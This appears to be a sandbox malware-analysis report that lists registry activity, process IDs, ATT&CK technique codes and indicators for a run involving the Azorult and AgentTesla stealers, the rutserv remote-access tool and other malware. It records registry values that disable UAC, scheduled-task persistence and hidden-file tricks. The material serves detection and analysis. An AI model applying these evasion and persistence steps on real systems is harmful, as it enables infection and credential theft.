Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3112	1952	WerFault.exe	150

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Azorult.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wini.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rutserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	website ip grabber.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 8 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3280	cmd.exe
1136	PING.EXE
3512	cmd.exe
7724	PING.EXE
5172	cmd.exe
7848	PING.EXE
2060	cmd.exe
3632	PING.EXE

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe

Delays execution with timeout.exe 7 IoCs

defense_evasion

pid	Process
5048	timeout.exe
3616	timeout.exe
4812	timeout.exe
1052	timeout.exe
2200	timeout.exe
2376	timeout.exe
2860	timeout.exe

Discovers systems in the same network 1 TTPs 2 IoCs

discovery

Remote System Discovery

T1018

pid	Process
7308	net.exe
7340	net.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers network information 2 TTPs 2 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
6592	ipconfig.exe
3676	ipconfig.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
4972	taskkill.exe
1612	taskkill.exe
1136	taskkill.exe
7164	taskkill.exe
5024	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133827967324055979"	chrome.exe

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000_Classes\Local Settings	wini.exe
Key created	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000_Classes\MIME\Database	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000_Classes\Local Settings	R8.exe
Key created	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000_Classes\Local Settings	cmd.exe

Modifies registry key 1 TTPs 45 IoCs

Modify Registry

T1112

pid	Process
1800	reg.exe
7548	reg.exe
2200	reg.exe
7960	reg.exe
6908	reg.exe
5944	reg.exe
6360	reg.exe
2992	reg.exe
8144	reg.exe
2868	reg.exe
5420	reg.exe
7700	reg.exe
2176	reg.exe
544	reg.exe
4932	reg.exe
7448	reg.exe
5224	reg.exe
1964	reg.exe
2924	reg.exe
5384	reg.exe
3252	reg.exe
4064	reg.exe
3676	reg.exe
5820	reg.exe
7932	reg.exe
2848	reg.exe
7176	reg.exe
6340	reg.exe
5492	reg.exe
6900	reg.exe
7344	reg.exe
2820	reg.exe
3740	reg.exe
5444	reg.exe
3512	reg.exe
7720	reg.exe
8180	reg.exe
7004	reg.exe
5564	reg.exe
7088	reg.exe
1948	reg.exe
7904	reg.exe
8120	reg.exe
8120	reg.exe
5376	reg.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2	taskhostw.exe

Runs .reg file with regedit 2 IoCs

pid	Process
3624	regedit.exe
752	regedit.exe

Runs net.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
7848	PING.EXE
3632	PING.EXE
1136	PING.EXE
7724	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3512	schtasks.exe
1156	schtasks.exe
4572	schtasks.exe
3460	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4708	chrome.exe
4708	chrome.exe
4900	chrome.exe
4900	chrome.exe
4900	chrome.exe
4900	chrome.exe
2452	Azorult (1).exe
2452	Azorult (1).exe
2452	Azorult (1).exe
2452	Azorult (1).exe
2452	Azorult (1).exe
2452	Azorult (1).exe
2452	Azorult (1).exe
2452	Azorult (1).exe
2452	Azorult (1).exe
2452	Azorult (1).exe
1912	Azorult.exe
1912	Azorult.exe
1912	Azorult.exe
1912	Azorult.exe
1912	Azorult.exe
1912	Azorult.exe
1912	Azorult.exe
1912	Azorult.exe
1912	Azorult.exe
1912	Azorult.exe
700	rutserv.exe
700	rutserv.exe
700	rutserv.exe
700	rutserv.exe
700	rutserv.exe
700	rutserv.exe
1788	Azorult.exe
1788	Azorult.exe
1788	Azorult.exe
1788	Azorult.exe
1788	Azorult.exe
1788	Azorult.exe
1788	Azorult.exe
1788	Azorult.exe
1788	Azorult.exe
1788	Azorult.exe
2992	rutserv.exe
2992	rutserv.exe
4476	rutserv.exe
4476	rutserv.exe
1468	rutserv.exe
1468	rutserv.exe
1468	rutserv.exe
1468	rutserv.exe
1468	rutserv.exe
1468	rutserv.exe
3600	rfusclient.exe
3600	rfusclient.exe
3976	winit.exe
3976	winit.exe
3976	winit.exe
3976	winit.exe
3976	winit.exe
3976	winit.exe
3976	winit.exe
3976	winit.exe
3976	winit.exe
3976	winit.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2740	taskhostw.exe

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
652	Process not Found
652	Process not Found
652	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs

pid	Process
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
536	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe
Token: SeShutdownPrivilege	4708	chrome.exe
Token: SeCreatePagefilePrivilege	4708	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe

Suspicious use of SetWindowsHookEx 23 IoCs

pid	Process
4708	chrome.exe
5052	Aurora Worm v1-Cracked by RoN1N.exe
4060	Amus.exe
5100	AgentTesla.exe
2452	Azorult (1).exe
1912	Azorult.exe
4972	wini.exe
3976	winit.exe
1788	Azorult.exe
700	rutserv.exe
620	cheat.exe
2992	rutserv.exe
444	ink.exe
4476	rutserv.exe
2256	taskhost.exe
1468	rutserv.exe
3556	P.exe
3204	R8.exe
3972	winlogon.exe
2740	taskhostw.exe
4064	winlogon.exe
3244	Maldal.a.exe
4732	Mari.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4708 wrote to memory of 4316	4708	chrome.exe	85
PID 4708 wrote to memory of 4316	4708	chrome.exe	85
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 3988	4708	chrome.exe	87
PID 4708 wrote to memory of 4744	4708	chrome.exe	88
PID 4708 wrote to memory of 4744	4708	chrome.exe	88
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89
PID 4708 wrote to memory of 2124	4708	chrome.exe	89

System policy modification 1 TTPs 3 IoCs

defense_evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult (1).exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult (1).exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Azorult (1).exe

Views/modifies file attributes 1 TTPs 6 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4820	attrib.exe
916	attrib.exe
5276	attrib.exe
6284	attrib.exe
4540	attrib.exe
404	attrib.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://roblox.com
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4708
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff948d9cc40,0x7ff948d9cc4c,0x7ff948d9cc58
  2⤵
  PID:4316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1872,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=1844 /prefetch:2
  2⤵
  PID:3988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2132,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=2164 /prefetch:3
  2⤵
  - Downloads MZ/PE file
  PID:4744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2256,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=2268 /prefetch:8
  2⤵
  PID:2124
